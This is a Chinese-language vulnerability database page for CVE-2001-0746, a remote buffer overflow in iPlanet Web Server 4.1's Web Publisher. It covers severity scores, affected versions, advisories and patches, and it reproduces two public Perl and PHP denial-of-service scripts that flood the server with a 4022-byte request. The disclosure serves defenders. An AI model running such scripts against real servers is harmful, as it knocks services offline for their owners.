CVE-2001-0746
CVSS10.0
发布时间 :2001-10-18 00:00:00
修订时间 :2008-09-05 16:24:49
NMCOES    

[原文]Buffer overflow in Web Publisher in iPlanet Web Server Enterprise Edition 4.1 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a request for a long URI with (1) GETPROPERTIES, (2) GETATTRIBUTENAMES, or other methods.


[CNNVD]iPlanet Web Publisher远程缓冲区溢出漏洞(CNNVD-200110-114)

        iPlanet Web Server Enterprise Edition 4.1版本及之前版本的Web Publisher存在缓冲区溢出漏洞。远程攻击者可以借助带有(1)GETPROPERTIES、(2)GETATTRIBUTENAMES或其他方法的超长URI的请求导致服务拒绝并且可能执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:iplanet:iplanet_web_server:4.1_sp3
cpe:/a:iplanet:iplanet_web_server:4.1_sp4
cpe:/a:iplanet:iplanet_web_server:4.1_sp7
cpe:/a:iplanet:iplanet_web_server:4.1_sp6
cpe:/a:iplanet:iplanet_web_server:4.1_sp5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0746
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0746
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-114
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/6554.php
(VENDOR_ADVISORY)  XF  netscape-enterprise-uri-bo(6554)
http://www.securityfocus.com/bid/2732
(VENDOR_ADVISORY)  BID  2732
http://iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
(VENDOR_ADVISORY)  CONFIRM  http://iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
http://archives.neohapsis.com/archives/bugtraq/2001-05/0132.html
(VENDOR_ADVISORY)  BUGTRAQ  20010515 iPlanet - Netscape Enterprise Web Publisher Buffer Overflow

- 漏洞信息

iPlanet Web Publisher远程缓冲区溢出漏洞
危急 缓冲区溢出
2001-10-18 00:00:00 2006-09-22 00:00:00
远程  
        iPlanet Web Server Enterprise Edition 4.1版本及之前版本的Web Publisher存在缓冲区溢出漏洞。远程攻击者可以借助带有(1)GETPROPERTIES、(2)GETATTRIBUTENAMES或其他方法的超长URI的请求导致服务拒绝并且可能执行任意代码。

- 公告与补丁

        iPlanet has made a NSAPI patch available.
        This issue will also be addressed by the release of iPlanet Web Server, Enterprise Edition version 4.1 Service Pack 8.
        HP VirtualVault 4.0
        
        iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP3
        
        iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP6
        
        iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP5
        
        iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP7
        
        iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP4
        

- 漏洞信息 (20852)

iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (1) (EDBID:20852)
multiple dos
2001-05-15 Verified
0 Santi Claus
N/A [点击下载]
source: http://www.securityfocus.com/bid/2732/info

iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance.

By sending a specially crafted request (composed of at least 2000 characters) it is possible to cause a buffer overflow. This could cause the termination of the affected service, requiring a restart and enabling a remote attacker to effect a denial of service attack.

If the submitted buffer is properly structured, it may yield a remote system shell.

Successful exploitation of this vulnerability could lead to a complete compromise of the host.

Note that while only installations of iWS4.1sp3-7 on Windows NT are immediately vulnerable to this attack, all users of iWS4.1sp3-7 are advised to install the NSAPI. 

#!/usr/bin/perl
use IO::Socket;
  if (@ARGV < 2)  {
     print "Usage: host port\n";
     exit;
   }
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
  $sock= IO::Socket::INET->new(Proto=>"TCP",
			     PeerAddr=>$ARGV[0],
			     PeerPort=>"$ARGV[1]",)
			     or die "Cant connect to $ARGV[0]: $!\n";
  $sock->autoflush(1);
  print $sock "$overflow /index.html HTTP/1.0\n\n";
  $response=<$sock>;
  print "$response";
  while(<$sock>){
     print "$_\n";
  }
  close $sock;
}
		

- 漏洞信息 (20853)

iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (2) (EDBID:20853)
multiple dos
2001-05-15 Verified
0 Gabriel Maggiotti
N/A [点击下载]
source: http://www.securityfocus.com/bid/2732/info
 
iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance.
 
By sending a specially crafted request (composed of at least 2000 characters) it is possible to cause a buffer overflow. This could cause the termination of the affected service, requiring a restart and enabling a remote attacker to effect a denial of service attack.
 
If the submitted buffer is properly structured, it may yield a remote system shell.
 
Successful exploitation of this vulnerability could lead to a complete compromise of the host.
 
Note that while only installations of iWS4.1sp3-7 on Windows NT are immediately vulnerable to this attack, all users of iWS4.1sp3-7 are advised to install the NSAPI. 

#!/usr/local/bin/php -q
<?
/*
 * Netscape Enterprise Server 4 Method and URI overflow 
 *
 * By sending an invalid method or URI request of 4022 bytes Netscape 
 * Enterprise Server will 
 * stop responding to requests. 
 *
 * Written by Gabriel Maggiotti
 */

	if( $argc!=3)
	{
	echo "usagge: $argv[0] <host> <port>\n";
	return 1;
	}


$host=$argv[1];
$port=$argv[2];

	for($i=0;$i<4022;$i++)
		$overflow.="A";
	
$overflow.=" /index.htm HTTP/1.0\n\n";

$fp = fsockopen ($host, $port , &$errno, &$errstr, 30);
 if (!$fp) {
     echo "Couldn't create connection<br>\n";
 } else {
	fputs ($fp, $overflow);
}
fclose ($fp);

?>

		

- 漏洞信息

3235
iPlanet Web Publisher Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

iPlanet Web Publisher contains a flaw that allows a remote attacker cause a denial of service or possibly execute arbitrary code. The issue is due to an overflow in the URI handler when improper GETPROPERTIES or GETATTRIBUTENAMES parameters are specified.

- 时间线

2001-05-21 Unknow
2001-05-21 Unknow

- 解决方案

Upgrade to version 4.1 Service Pack 8 or higher, as it has been reported to fix this vulnerability. iPlanet has released an NSAPI patch to address this vulnerability as well.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

iPlanet Web Publisher Remote Buffer Overflow Vulnerability
Boundary Condition Error 2732
Yes No
2001-05-15 12:00:00 2009-07-11 06:06:00
Reported to bugtraq by Santi Claus <wurzelsepp201@hotmail.com> on May 14, 2001, and was originally discovered by Robert Cardona <dasquid@digizen-security.com> of the Digizen Security Group on April 25, 2001.

- 受影响的程序版本

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP7
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 d
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Linux kernel 2.2.12
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 2.6
iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP6
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 d
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Linux kernel 2.2.12
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 2.6
iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP5
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 d
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Linux kernel 2.2.12
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 2.6
iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP4
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 d
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Linux kernel 2.2.12
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 2.6
iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP3
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 d
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Linux kernel 2.2.12
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 2.6
HP VirtualVault 4.0
+ HP HP-UX 11.0 4
+ HP HP-UX (VVOS) 11.0 4
+ Sun iPlanet Web Server 4.0

- 漏洞讨论

iPlanet Webserver is an http server product offered by the Sun-Netscape Alliance.

By sending a specially crafted request (composed of at least 2000 characters) it is possible to cause a buffer overflow. This could cause the termination of the affected service, requiring a restart and enabling a remote attacker to effect a denial of service attack.

If the submitted buffer is properly structured, it may yield a remote system shell.

Successful exploitation of this vulnerability could lead to a complete compromise of the host.

Note that while only installations of iWS4.1sp3-7 on Windows NT are immediately vulnerable to this attack, all users of iWS4.1sp3-7 are advised to install the NSAPI.

- 漏洞利用

Gabriel Maggiotti &lt;gmaggiot@ciudad.com.ar&gt; has provided the following exploit:

netscape_server.php.txt

- 解决方案

iPlanet has made a NSAPI patch available.

This issue will also be addressed by the release of iPlanet Web Server, Enterprise Edition version 4.1 Service Pack 8.


HP VirtualVault 4.0

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP3

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP6

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP5

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP7

iPlanet E-Commerce Solutions iPlanet Web Server Enterprise Edition 4.1 SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站